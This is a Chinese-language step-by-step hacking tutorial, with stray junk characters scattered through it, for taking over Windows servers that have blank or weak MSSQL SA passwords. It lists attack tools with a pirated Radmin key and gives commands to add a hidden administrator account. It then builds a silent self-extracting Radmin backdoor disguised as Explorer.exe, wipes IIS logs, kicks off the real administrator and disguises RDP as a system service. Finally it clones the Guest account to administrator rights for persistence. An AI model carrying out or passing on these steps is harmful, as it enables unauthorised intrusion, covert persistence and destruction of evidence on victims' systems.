工具:WINNTAutoAttack自動攻擊器（掃漏洞）业稼；SQLTOOLS（SA空口令連接器）诉濒；RAMDIN影子3.0中文版（遠(yuǎn)程控制程序）（RADMIN注冊碼:

08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA

6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）板祝；SC.exe port.bat query.exe quser.exe（隱藏3389服務(wù)及不讓管理發(fā)現(xiàn)自己程序）悬嗓；CleanIISLog.exe（小榕的擦PP程序）顾稀；3389.exe（開3389端口服務(wù)的）博肋；psu.exe（使用被禁止的Guest帳戶要用到的）汪厨；mstsc.exe（遠(yuǎn)程桌面連接程序）赃春。

一.掃到SA弱口令(自動攻擊器)

二.用SQLTOOLS連上去建一個用戶

net start telnet

開telnet服務(wù)

net user mint mint /add

添加用戶mint密碼為

mint net localgroup administrators mint /add

將帳號mint升級為管理員

三.上傳后門程序RAD.EXE(RADMIN服務(wù)端自解壓程序)

制作RAD.EXE過程:

1、到Radmin安裝目錄下找到AdmDll.dll劫乱、 raddrv.dll和r_sever.exe织中；

2、在本地設(shè)置服務(wù)端（一定要生成）衷戈；

設(shè)置密碼-->>設(shè)置連接端口(默認(rèn)4489)-->>生成

3狭吼、導(dǎo)出注冊表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的鍵值為1.reg；

4殖妇、編寫一個批處理刁笙，并命名為u.bat；

@echo offnet stop r_server

5拉一、寫第二個批處理采盒，r.bat,內(nèi)容為：

@echo off@Explorer.exe /

uninstall /silence@Explorer.exe /install /

silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /

silence@Explorer.exe /install /silence@regedit /

s 1.reg@net start r_server@del

rad.exe@del 1.reg@del r.bat@del u.bat

6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包蔚润；

7磅氨、將Rad.rar制作成自解壓文件；

選擇Default.sfx的自釋放模塊-->>高級自釋放選項(xiàng)

-->>常規(guī)

釋放路徑:%systemroot%\\system32

安裝程序:釋放后運(yùn)行:r.bat 釋放前運(yùn)行u.bat

-->>摸式

緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件

-->>確定-->>確定

生成完成嫡纠。

四.用RADMIN客服端連接

上傳文件到c:\\WINNT(XP是windows):

port.bat(如果是在XP下烦租，這個要把里面的WINNT改為Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上傳一個反彈后門RADMIN進(jìn)入TELNET延赌。

運(yùn)行c:\\winnt\\3389.exe，重啟肉雞叉橱。

五.重啟后用遠(yuǎn)程桌面遠(yuǎn)程器連上去

這里就有時會出現(xiàn)個問題挫以。

使用3389登陸，發(fā)現(xiàn)登陸用戶已滿窃祝，不用怕掐松，我們把他踢出去。

telnet對方ip粪小，發(fā)現(xiàn)需要 NTLM 身份驗(yàn)證大磺。我們在自己的電腦里建立一個帳號mint密碼為mint身份為管理員。

找到c:\\winnt\\system32\\cmd.exe 建立一個快捷方式到桌面探膊。修改cmd的快捷方式屬性為允許其他身份登陸杠愧。然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號mint密碼mint逞壁，telnet對方ip流济，直接可以登陸對方電腦了。

使用命令：

c:\\query user (查看對方目前終端登陸狀況腌闯。)

運(yùn)行命令：

c:\\logoff 1(踢出去一個管理者)

再用c:\\query user檢查一便~~(這就是為什么不馬上用1.bat了)

六.連上后..在cmd下運(yùn)行

c:\\winnt\\log . 自己的IP .(擦PP)

c:\\winnet\\1.bat (刪除覆蓋查看當(dāng)前在線用戶文件)

七.打SA空口令補(bǔ)丁

程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)

-->>Windowst身位驗(yàn)證登陸

復(fù)制一下代碼:SELMIS

if exists (select * from dbo.sysobjects where id

= object_id(N\’[dbo].[xp_cmdshell]\’)

and OBJECTPROPERTY(id, N\’IsExtendedProc\’)

= 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’GO

按F5(運(yùn)行)绳瘟，關(guān)了退出SQL Server再用SQL Server身位驗(yàn)證進(jìn)一次，退出(這是為了不留下記錄)绑嘹。

八.改3389端口和服務(wù)名稱

修改服務(wù)器端的端口設(shè)置稽荧，注冊表有2個地方需要修改。

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]工腋，PortNumber值姨丈，默認(rèn)是3389，選擇10進(jìn)制擅腰，修改成所希望的端口蟋恬，比如1314。

第二個地方：

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　PortNumber值趁冈，默認(rèn)是3389歼争，選擇10進(jìn)制，修改成所希望的端口渗勘，比如1314沐绒。

要重啟系統(tǒng)才能用新端口連。(不急..改了他的服務(wù)名再重啟系統(tǒng)吧)

導(dǎo)出3389服務(wù)的

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]

的鍵值為mm.reg文件旺坠。編輯mm.reg文件玫恳，替換TermService為Alerter(錯誤警告服務(wù)..別的服務(wù)也行) 宛逗。再把第十行的"Description"="(這里是服務(wù)說明擂达，改為你所換的服務(wù)說明，這里改為通知所選用戶和計(jì)算機(jī)有關(guān)系統(tǒng)管理級警報(bào)出刷。)"第十一行的"DisplayName"="(這里是服務(wù)名稱，改為你所換的服務(wù)名稱坯辩，這里改為Alerter)馁龟。保存，再導(dǎo)入注冊表(這里要先運(yùn)行Services.msc(可在CMD下打這命令)服務(wù)管理器..把Alerter的服務(wù)先停止)漆魔。

再在CMD下

CD c:\\winnt\\

system32 copy termsrv.exe service.exe

(這里是復(fù)制termsrv.exe為Alerter服務(wù)文件名差不多的文件)

CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=

c:\\winnt\\system32\\service.exe

(這里是從新定向Alerter服務(wù)文件.服務(wù)名一定要區(qū)分大小寫A要大寫)

九.注消后(注消比直接關(guān)要好些)用Radmin重啟肉雞

十.使用被禁用的帳戶[Guest]登陸坷檩，刪除自己開始建的帳號

1.使用psu.exe展開注冊表到

HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users

用法：[psu -p regedit -i pid]

Pid 的值為在任務(wù)欄空白處點(diǎn)右鍵-->>任務(wù)管理器--->>進(jìn)程中的winlogon.exe后面的數(shù)值就是PID數(shù)值。

如：psu –p regedit –i 157

將Guest克成管理員權(quán)限有送，克成管理員權(quán)限的方法:

找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的類型值淌喻。

在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到這個類型值在復(fù)制數(shù)值名為F的數(shù)值數(shù)劇覆蓋相應(yīng)的Guest的類型值(找的方法一樣)。

導(dǎo)出Guest的配置(也就是導(dǎo)出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相應(yīng)的類型值的數(shù)據(jù))雀摘，然后刪除Guest的配置。

2.查看計(jì)算機(jī)管理中帳戶列表八拱，刷新這時候會出現(xiàn)錯誤[找不到帳戶](跳過這步也行)阵赠。

3.將Guest的配置(二個REG文件導(dǎo)進(jìn)注冊表)。

4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]肌稻。

net user Guest ****

[修改密碼]net user Guest /

active:yesnet user Guest /active:no[命令行下禁用Guest]

5.實(shí)驗(yàn)被禁止的帳戶Guest是否可用清蚀。

6.用Guest登陸后刪除自己建的帳號。

net user mint /del